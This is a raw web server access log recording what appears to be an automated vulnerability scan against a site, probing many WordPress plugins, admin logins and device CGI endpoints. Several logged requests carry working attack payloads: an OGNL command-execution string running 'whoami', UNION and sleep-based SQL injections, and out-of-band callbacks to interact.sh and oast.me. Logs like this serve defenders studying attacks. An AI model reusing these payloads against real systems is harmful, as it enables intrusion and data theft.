205.185.122.202 - - [19/Oct/2025:17:34:58 +0530] "POST null null" 400 -
205.185.122.202 - - [19/Oct/2025:17:34:59 +0530] "GET /vcac/?original_uri=http://103.145.51.74:8080%2Fvcac HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:17:35:00 +0530] "GET /vcac/?original_uri=http://103.145.51.236:8080%2Fvcac HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:17:35:01 +0530] "POST null null" 400 -
205.185.122.202 - - [19/Oct/2025:17:35:01 +0530] "GET /wbm/login/?next=https%3A%2F%2Finteract.sh HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:17:35:01 +0530] "GET /wbm/login/?next=https%3A%2F%2Finteract.sh HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:17:35:02 +0530] "POST null null" 400 -
205.185.122.202 - - [19/Oct/2025:17:35:05 +0530] "POST null null" 400 -
205.185.122.202 - - [19/Oct/2025:17:35:06 +0530] "GET /wp-content/plugins/feed-them-social/readme.txt HTTP/1.1" 404 1086
205.185.122.202 - - [19/Oct/2025:17:35:06 +0530] "GET /wp-content/plugins/vr-calendar-sync/assets/js/public.js HTTP/1.1" 404 1104
205.185.122.202 - - [19/Oct/2025:17:35:06 +0530] "GET /wp-content/plugins/feed-them-social/readme.txt HTTP/1.1" 404 1086
205.185.122.202 - - [19/Oct/2025:17:35:07 +0530] "GET /wp-content/plugins/vr-calendar-sync/assets/js/public.js HTTP/1.1" 404 1104
205.185.122.202 - - [19/Oct/2025:17:35:07 +0530] "POST null null" 400 -
205.185.122.202 - - [19/Oct/2025:17:35:08 +0530] "POST null null" 400 -
205.185.122.202 - - [19/Oct/2025:17:35:10 +0530] "GET /wp-admin/admin-post.php?vrc_cmd=phpinfo HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:35:11 +0530] "GET /wp-admin/admin-post.php?vrc_cmd=phpinfo HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:35:14 +0530] "GET /wp-json/rps_result/v1/route/student_fields HTTP/1.1" 404 1078
205.185.122.202 - - [19/Oct/2025:17:35:14 +0530] "GET /wp-json/rps_result/v1/route/student_fields HTTP/1.1" 404 1078
205.185.122.202 - - [19/Oct/2025:17:35:17 +0530] "GET /wp-json/rps_result/v1/route/search_student?department_id=1&batch_id=1 HTTP/1.1" 404 1078
205.185.122.202 - - [19/Oct/2025:17:35:18 +0530] "GET /wp-json/rps_result/v1/route/search_student?department_id=1&batch_id=1 HTTP/1.1" 404 1078
205.185.122.202 - - [19/Oct/2025:17:35:24 +0530] "POST /cms/content/list HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:17:35:25 +0530] "POST /cms/content/list HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:17:35:57 +0530] "POST /ca/rest/certrequests HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:17:35:57 +0530] "POST /ca/rest/certrequests HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:17:35:57 +0530] "GET /iupjournals/index.php/esj HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:17:35:57 +0530] "GET /iupjournals/index.php/esj HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:17:36:04 +0530] "POST /admin/login.php HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:17:36:04 +0530] "POST /admin/login.php HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:17:36:13 +0530] "POST /api.php HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:17:36:14 +0530] "POST /api.php HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:17:36:45 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:17:36:45 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:17:37:49 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:37:49 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:38:25 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:38:25 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:38:34 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:38:34 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:38:48 +0530] "POST /login.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:17:38:48 +0530] "POST /login.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:17:38:53 +0530] "POST /servlet/GetProductVersion HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:17:38:53 +0530] "POST /servlet/GetProductVersion HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:17:38:58 +0530] "POST /geoserver/wms HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:17:38:59 +0530] "POST /geoserver/wms HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:17:39:13 +0530] "GET /bin/login/XWikiLogin?xpage=uorgsuggest&uorg=user&wiki&media=json HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:17:39:13 +0530] "GET /bin/login/XWikiLogin?xpage=uorgsuggest&uorg=user&wiki&media=json HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:17:39:16 +0530] "GET /xwiki/bin/login/XWikiLogin?xpage=uorgsuggest&uorg=user&wiki&media=json HTTP/1.1" 404 1046
205.185.122.202 - - [19/Oct/2025:17:39:17 +0530] "GET /xwiki/bin/login/XWikiLogin?xpage=uorgsuggest&uorg=user&wiki&media=json HTTP/1.1" 404 1046
205.185.122.202 - - [19/Oct/2025:17:39:33 +0530] "POST /cgi-bin/nightled.cgi HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:17:39:33 +0530] "POST /cgi-bin/nightled.cgi HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:17:39:48 +0530] "POST /index.php?owa_do=base.loginForm&owa_site_id HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:17:39:48 +0530] "POST /index.php?owa_do=base.loginForm&owa_site_id HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:17:39:51 +0530] "GET /owa-data/caches/1/owa_user/c30da9265ba0a4704db9229f864c9eb7.php HTTP/1.1" 404 1120
205.185.122.202 - - [19/Oct/2025:17:39:52 +0530] "GET /owa-data/caches/1/owa_user/c30da9265ba0a4704db9229f864c9eb7.php HTTP/1.1" 404 1120
205.185.122.202 - - [19/Oct/2025:17:39:56 +0530] "POST /index.php?owa_do=base.loginForm&owa_site_id HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:17:39:57 +0530] "POST /index.php?owa_do=base.loginForm&owa_site_id HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:17:40:24 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:40:24 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:40:26 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:17:40:27 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:17:40:29 +0530] "GET /34HFSuXj5Edej93MdcW3Qpof3H8 HTTP/1.1" 404 1048
205.185.122.202 - - [19/Oct/2025:17:40:30 +0530] "GET /34HFSuXj5Edej93MdcW3Qpof3H8 HTTP/1.1" 404 1048
205.185.122.202 - - [19/Oct/2025:17:40:55 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:40:55 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:41:00 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:41:00 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:41:26 +0530] "GET /wp-admin/admin-ajax.php?action=searchwp_live_search&swpquery=a&post_status=publish HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:41:26 +0530] "GET /wp-admin/admin-ajax.php?action=searchwp_live_search&swpquery=a&post_status=publish HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:41:27 +0530] "POST /bonita/loginservice HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:17:41:28 +0530] "GET /wp-admin/admin-ajax.php?action=searchwp_live_search&swpquery=a&post_status=draft HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:41:29 +0530] "GET /wp-admin/admin-ajax.php?action=searchwp_live_search&swpquery=a&post_status=draft HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:41:30 +0530] "POST /bonita/loginservice HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:17:41:55 +0530] "POST /alerts/alertLightbox.php HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:17:41:55 +0530] "POST /alerts/alertLightbox.php HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:17:42:10 +0530] "POST /alerts/alertConfigField.php HTTP/1.1" 404 1048
205.185.122.202 - - [19/Oct/2025:17:42:10 +0530] "POST /alerts/alertConfigField.php HTTP/1.1" 404 1048
205.185.122.202 - - [19/Oct/2025:17:42:34 +0530] "POST /admin/uploads.php?id=1 HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:17:42:34 +0530] "POST /admin/uploads.php?id=1 HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:17:42:40 +0530] "POST /js/filemanager/api/index.php HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:17:42:41 +0530] "POST /js/filemanager/api/index.php HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:17:42:43 +0530] "POST /dologin.action HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:17:42:43 +0530] "POST /dologin.action HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:17:42:44 +0530] "GET /34HFRoZ3laKS3S1UZCnTJRsBBFF.txt HTTP/1.1" 404 1056
205.185.122.202 - - [19/Oct/2025:17:42:44 +0530] "GET /34HFRoZ3laKS3S1UZCnTJRsBBFF.txt HTTP/1.1" 404 1056
205.185.122.202 - - [19/Oct/2025:17:42:45 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:17:42:45 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:17:42:49 +0530] "GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1" 404 1568
205.185.122.202 - - [19/Oct/2025:17:42:50 +0530] "GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1" 404 1568
205.185.122.202 - - [19/Oct/2025:17:42:58 +0530] "POST /wp-admin/admin-ajax.php?td_theme_name=Newspaper&v=11.2 HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:42:59 +0530] "POST /wp-admin/admin-ajax.php?td_theme_name=Newspaper&v=11.2 HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:43:09 +0530] "GET /index.php/video/?dl=aHR0cHM6Ly9vYXN0Lm1lLw== HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:17:43:09 +0530] "GET /index.php/video/?dl=aHR0cHM6Ly9vYXN0Lm1lLw== HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:17:43:25 +0530] "POST /cms/content/list HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:17:43:25 +0530] "POST /cms/content/list HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:17:43:31 +0530] "POST /api/content/ HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:17:43:32 +0530] "POST /api/content/ HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:17:43:33 +0530] "POST /OASREST/v2/authenticate HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:43:34 +0530] "POST /OASREST/v2/authenticate HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:43:34 +0530] "GET /34HFSdrRpjjrKAQ4YWetDiBievH.jsp HTTP/1.1" 404 1056
205.185.122.202 - - [19/Oct/2025:17:43:35 +0530] "GET /34HFSdrRpjjrKAQ4YWetDiBievH.jsp HTTP/1.1" 404 1056
205.185.122.202 - - [19/Oct/2025:17:44:07 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:17:44:09 +0530] "GET null null" 400 -
196.251.69.18 - - [19/Oct/2025:17:44:21 +0530] "-" 400 -
196.251.69.18 - - [19/Oct/2025:17:44:22 +0530] "-" 400 -
196.251.69.18 - - [19/Oct/2025:17:44:23 +0530] "-" 400 -
196.251.69.18 - - [19/Oct/2025:17:44:24 +0530] "-" 400 -
196.251.69.18 - - [19/Oct/2025:17:44:24 +0530] "-" 400 -
196.251.69.18 - - [19/Oct/2025:17:44:26 +0530] "-" 400 -
196.251.69.18 - - [19/Oct/2025:17:44:27 +0530] "-" 400 -
196.251.69.18 - - [19/Oct/2025:17:44:28 +0530] "-" 400 -
196.251.69.18 - - [19/Oct/2025:17:44:30 +0530] "-" 400 -
196.251.69.18 - - [19/Oct/2025:17:44:32 +0530] "-" 400 -
196.251.69.18 - - [19/Oct/2025:17:44:33 +0530] "-" 400 -
176.65.149.21 - - [19/Oct/2025:17:44:56 +0530] "GET / HTTP/1.1" 200 11250
176.65.149.21 - - [19/Oct/2025:17:44:58 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:45:10 +0530] "GET /mims/updatecustomer.php?customer_number=-1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(md5(999999999),1,2),NULL,NULL,NULL,NULL,NULL,NULL' HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:45:10 +0530] "GET /mims/updatecustomer.php?customer_number=-1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(md5(999999999),1,2),NULL,NULL,NULL,NULL,NULL,NULL' HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:45:44 +0530] "GET /admin/ajax/pages.php?id=(sleep(6)) HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:17:45:44 +0530] "GET /admin/ajax/pages.php?id=(sleep(6)) HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:17:46:08 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:46:08 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:47:02 +0530] "POST /admin/asign-single-student-subjects.php HTTP/1.1" 404 1072
205.185.122.202 - - [19/Oct/2025:17:47:02 +0530] "POST /admin/asign-single-student-subjects.php HTTP/1.1" 404 1072
205.185.122.202 - - [19/Oct/2025:17:47:41 +0530] "GET /navigate/login.php HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:17:47:41 +0530] "GET /navigate/login.php HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:17:48:00 +0530] "POST /wp-login.php HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:17:48:00 +0530] "POST /wp-login.php HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:17:48:03 +0530] "POST /wp-admin/admin-ajax.php?action=check_country_selector HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:48:03 +0530] "POST /wp-admin/admin-ajax.php?action=check_country_selector HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:48:33 +0530] "POST /admin/index.php HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:17:48:33 +0530] "POST /admin/index.php HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:17:48:36 +0530] "GET /admin/dashboard.php HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:17:48:36 +0530] "GET /admin/dashboard.php HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:17:48:36 +0530] "POST /dfsms/index.php HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:17:48:36 +0530] "POST /dfsms/index.php HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:17:48:37 +0530] "POST /ccms/index.php HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:17:48:37 +0530] "POST /ccms/index.php HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:17:48:40 +0530] "GET /dfsms/add-category.php HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:17:48:40 +0530] "GET /dfsms/add-category.php HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:17:48:40 +0530] "GET /ccms/dashboard.php HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:17:48:40 +0530] "GET /ccms/dashboard.php HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:17:48:43 +0530] "POST /ubus/ HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:17:48:44 +0530] "POST /ubus/ HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:17:49:19 +0530] "PUT /v1/agent/check/register HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:17:49:19 +0530] "PUT /v1/agent/check/register HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:17:49:20 +0530] "POST /conf_mail.php HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:17:49:20 +0530] "POST /conf_mail.php HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:17:49:21 +0530] "PUT /v1/agent/check/deregister/34HFSYuJcSsFmQZxHfnMViWZdfI HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:17:49:22 +0530] "PUT /v1/agent/check/deregister/34HFSYuJcSsFmQZxHfnMViWZdfI HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:17:49:23 +0530] "GET /nagiosxi/login.php?redirect=/www.interact.sh HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:17:49:23 +0530] "GET /nagiosxi/login.php?redirect=/www.interact.sh HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:17:50:02 +0530] "POST /scgi-bin/platform.cgi HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:17:50:02 +0530] "POST /scgi-bin/platform.cgi HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:17:50:03 +0530] "POST /fileupload/toolsAny HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:17:50:03 +0530] "POST /fileupload/toolsAny HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:17:50:05 +0530] "POST /scgi-bin/platform.cgi HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:17:50:05 +0530] "POST /scgi-bin/platform.cgi HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:17:50:07 +0530] "GET /authenticationendpoint/34hfqs98myrzdpbj2urtaig7f5z.jsp HTTP/1.1" 404 1102
205.185.122.202 - - [19/Oct/2025:17:50:07 +0530] "GET /authenticationendpoint/34hfqs98myrzdpbj2urtaig7f5z.jsp HTTP/1.1" 404 1102
205.185.122.202 - - [19/Oct/2025:17:50:17 +0530] "POST /cgi-bin/login.cgi HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:17:50:17 +0530] "POST /cgi-bin/login.cgi HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:17:51:14 +0530] "POST /app/options.py HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:17:51:14 +0530] "POST /app/options.py HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:17:52:02 +0530] "POST /app/options.py HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:17:52:04 +0530] "POST /app/options.py HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:17:52:10 +0530] "POST /wp-json/wpfm/v1/file-rename HTTP/1.1" 404 1048
205.185.122.202 - - [19/Oct/2025:17:52:11 +0530] "POST /wp-json/wpfm/v1/file-rename HTTP/1.1" 404 1048
205.185.122.202 - - [19/Oct/2025:17:52:13 +0530] "GET /pages/csv_export_results_metadata.php?k=zulu&personaldata=0&allavailable=true&submit=1 HTTP/1.1" 404 1068
205.185.122.202 - - [19/Oct/2025:17:52:14 +0530] "GET /pages/csv_export_results_metadata.php?k=zulu&personaldata=0&allavailable=true&submit=1 HTTP/1.1" 404 1068
205.185.122.202 - - [19/Oct/2025:17:52:15 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:52:15 +0530] "GET / HTTP/1.1" 200 11250
196.251.69.18 - - [19/Oct/2025:17:52:34 +0530] "-" 400 -
205.185.122.202 - - [19/Oct/2025:17:52:52 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:17:52:52 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:17:53:00 +0530] "GET /pfblockerng/www/index.php HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:17:53:00 +0530] "GET /pfblockerng/www/index.php HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:17:53:07 +0530] "GET /live_check.shtml HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:17:53:08 +0530] "GET /live_check.shtml HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:17:53:21 +0530] "POST /classes/Master.php?f=delete_request HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:17:53:21 +0530] "POST /classes/Master.php?f=delete_request HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:17:53:26 +0530] "POST /classes/Master.php?f=delete_team HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:17:53:26 +0530] "POST /classes/Master.php?f=delete_team HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:17:53:46 +0530] "POST /classes/Master.php?f=delete_inquiry HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:17:53:46 +0530] "POST /classes/Master.php?f=delete_inquiry HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:17:54:33 +0530] "POST /admin/ajax.php?action=login HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:17:54:34 +0530] "POST /admin/ajax.php?action=login HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:17:54:36 +0530] "GET /admin/index.php?page=home HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:17:54:37 +0530] "GET /admin/index.php?page=home HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:17:54:54 +0530] "POST /admin/ajax.php?action=login HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:17:54:55 +0530] "POST /admin/ajax.php?action=login HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:17:54:58 +0530] "GET /booking.php?car_id=-1%20union%20select%201,md5(999999999),3,4,5,6,7,8,9,10--+ HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:17:54:58 +0530] "GET /booking.php?car_id=-1%20union%20select%201,md5(999999999),3,4,5,6,7,8,9,10--+ HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:17:55:11 +0530] "POST /admin/ajax.php?action=login HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:17:55:11 +0530] "POST /admin/ajax.php?action=login HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:17:55:14 +0530] "GET /admin/view_car.php?id=-1%20union%20select%201,md5(999999999),3,4,5,6,7,8,9,10--+ HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:17:55:14 +0530] "GET /admin/view_car.php?id=-1%20union%20select%201,md5(999999999),3,4,5,6,7,8,9,10--+ HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:17:55:43 +0530] "POST /admin/ajax.php?action=login HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:17:55:44 +0530] "POST /admin/ajax.php?action=login HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:17:55:45 +0530] "POST /admin/ajax.php?action=login HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:17:55:46 +0530] "POST /admin/ajax.php?action=login HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:17:55:46 +0530] "GET /admin/manage_booking.php?id=-1%20union%20select%201,2,3,4,5,6,md5(999999999),8,9,10,11--+ HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:17:55:47 +0530] "GET /admin/manage_booking.php?id=-1%20union%20select%201,2,3,4,5,6,md5(999999999),8,9,10,11--+ HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:17:55:48 +0530] "GET /admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+ HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:17:55:49 +0530] "GET /admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+ HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:17:56:03 +0530] "POST /hms/doctor/ HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:17:56:03 +0530] "POST /hms/doctor/ HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:17:56:12 +0530] "POST /login.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:17:56:13 +0530] "POST /login.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:17:56:18 +0530] "GET /cgi/get_param.cgi?xml&sys.passwd&sys.su.name HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:17:56:18 +0530] "GET /cgi/get_param.cgi?xml&sys.passwd&sys.su.name HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:17:56:21 +0530] "GET /?wmcAction=wmcTrack&url=test&uid=0&pid=0&visitorId=1331'+and+sleep(7)+or+' HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:56:21 +0530] "GET /?wmcAction=wmcTrack&url=test&uid=0&pid=0&visitorId=1331'+and+sleep(7)+or+' HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:56:24 +0530] "GET /backupsettings.dat HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:17:56:24 +0530] "GET /backupsettings.dat HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:17:56:28 +0530] "GET /sysinit.shtml?r=52300 HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:17:56:28 +0530] "GET /sysinit.shtml?r=52300 HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:17:56:35 +0530] "GET /set_safety.shtml?r=52300 HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:17:56:35 +0530] "GET /set_safety.shtml?r=52300 HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:17:56:57 +0530] "POST /cgi-bin/login.cgi HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:17:56:57 +0530] "POST /cgi-bin/login.cgi HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:17:57:02 +0530] "GET /cgi-bin/ExportLogs.sh HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:17:57:02 +0530] "GET /cgi-bin/ExportLogs.sh HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:17:57:04 +0530] "GET /ws-api/v2/users/me/details?token=02 HTTP/1.1" 404 1046
205.185.122.202 - - [19/Oct/2025:17:57:04 +0530] "GET /ws-api/v2/users/me/details?token=02 HTTP/1.1" 404 1046
205.185.122.202 - - [19/Oct/2025:17:57:04 +0530] "POST /templates/default/html/windows/right.php HTTP/1.1" 404 1074
205.185.122.202 - - [19/Oct/2025:17:57:04 +0530] "POST /templates/default/html/windows/right.php HTTP/1.1" 404 1074
205.185.122.202 - - [19/Oct/2025:17:57:12 +0530] "POST /hms/admin/ HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:17:57:13 +0530] "POST /hms/admin/ HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:17:57:41 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:17:57:41 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:17:57:58 +0530] "POST /wp-json/woo-aliexpress/v1/product-sku HTTP/1.1" 404 1068
205.185.122.202 - - [19/Oct/2025:17:57:59 +0530] "POST /wp-json/woo-aliexpress/v1/product-sku HTTP/1.1" 404 1068
